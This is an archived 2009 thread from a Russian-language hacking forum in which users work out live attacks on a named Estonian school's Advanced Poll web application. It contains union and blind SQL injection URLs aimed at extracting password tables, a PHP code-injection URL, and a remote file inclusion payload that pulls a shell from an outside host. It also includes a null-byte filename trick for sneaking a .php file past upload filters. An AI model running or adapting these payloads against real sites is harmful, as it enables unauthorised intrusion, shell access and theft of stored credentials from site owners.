ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
24.11.2009, 21:22
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
Сообщение от GenTao
_http://www.astangukool.edu.ee/rus/poll/db/comments.php?action=send&id=2+union+select+1--&template_set=default
Чет не хочет крутиться дальше ).вывода нету,ascii тож не заюзать...
blind в demo_3.php
Код:
http://www.astangukool.edu.ee/rus/poll/db/demo_3.php?poll_id=4+and+substring(version(),1,1)=5--
Код:
http://www.astangukool.edu.ee/rus/poll/db/misc/info.php
Последний раз редактировалось z00MAN; 24.11.2009 в 21:25..
|
|
|
24.11.2009, 22:32
|
|
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
Провел на форуме:
143706
Репутация:
-1
|
|
Что так,что эдак - ничего не достать)
|
|
|
|
24.11.2009, 22:37
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Все прекрасно достается
http://www.astangukool.edu.ee/rus/poll/db/comments.php?action=send&id=2+and+if(ascii(substri ng((select+table_name+from+information_schema.colu mns+where+column_name+like+0x257061737325+limit+0, 1),1,1))>5,1,(select+1+union+select+2))
Читай статью https://forum.antichat.ru/thread35207.html
|
|
|
|
24.11.2009, 22:44
|
|
Banned
Регистрация: 24.07.2009
Сообщений: 85
Провел на форуме:
229533
Репутация:
43
|
|
Сообщение от GenTao
Что так,что эдак - ничего не достать)
да да Advanced Poll 2.02 
например http://milw0rm.com/exploits/3282
Последний раз редактировалось LzD; 24.11.2009 в 22:50..
|
|
|
|
24.11.2009, 22:50
|
|
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
Провел на форуме:
143706
Репутация:
-1
|
|
Ммм...без ифа никак не обойтись ? Длинная статья...в SIPT-е я так понял так не получится)Тогда чем перебирать ?
|
|
|
|
24.11.2009, 22:51
|
|
Banned
Регистрация: 24.07.2009
Сообщений: 85
Провел на форуме:
229533
Репутация:
43
|
|
Сообщение от GenTao
Ммм...без ифа никак не обойтись ? Длинная статья...в SIPT-е я так понял так не получится)Тогда чем перебирать ?
Грей писал скрипт для работы со слепыми инжектами 
|
|
|
|
24.11.2009, 23:33
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
http://www.astangukool.edu.ee/rus/poll/db/comments.php?id={${eval(phpinfo())}}
|
|
|
|
24.11.2009, 23:52
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от Twoster
А which тебе что покажет, если его нет?
т.е. результат which which и which curl будет разный, если самого which нету? =\
З.Ы. Модеры, сорри Если which нету, значит результат будет пустой, поэтому он не покажет есть ли качалки или их нет...
|
|
|
|
25.11.2009, 02:26
|
|
Banned
Регистрация: 24.07.2009
Сообщений: 85
Провел на форуме:
229533
Репутация:
43
|
|
Сообщение от [Raz0r]
http://www.astangukool.edu.ee/rus/poll/db/comments.php?id={${eval(phpinfo())}}
http://securityvulns.com/Odocument594.html 
http://[target]/poll/comments.php?id={${include($ddd)}}{${exit()}}&ddd= Http://EvilShell
(с) alguidy[at]hotmail[.]com
Последний раз редактировалось LzD; 25.11.2009 в 02:28..
|
|
|
|
25.11.2009, 18:01
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503
Репутация:
229
|
|
1. Объясните мне, все таки возможно отрубить конец названии файла нулл байтом при:
Content-Type: multipart/form-data
Если да то как это сделать? Правильно ли я это делаю
(этим -> %00 -> не получится отрубить естественно конец при multipart/form-data):
...
filename="thistest.php\x00.jpg"
...
второй вариант который пробывал:
...
filename="thistest.php\0.jpg"
...
2. Если выше перечисл. примеров отрубания конца нулл байтом работают при:
Content-Type: multipart/form-data
То как быть если часть названия файла до бек слеша ("\")
отрубается и считается директорией? Можно ли это обойти и все таки отрубить конец при:
Content-Type: multipart/form-data
Заранее спасибо за ответы
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?1712616){kind=avatar}
![Отправить сообщение для [Raz0r] с помощью ICQ](fusion/misc/im_icq.gif)
Похожие темы
Линейный вид
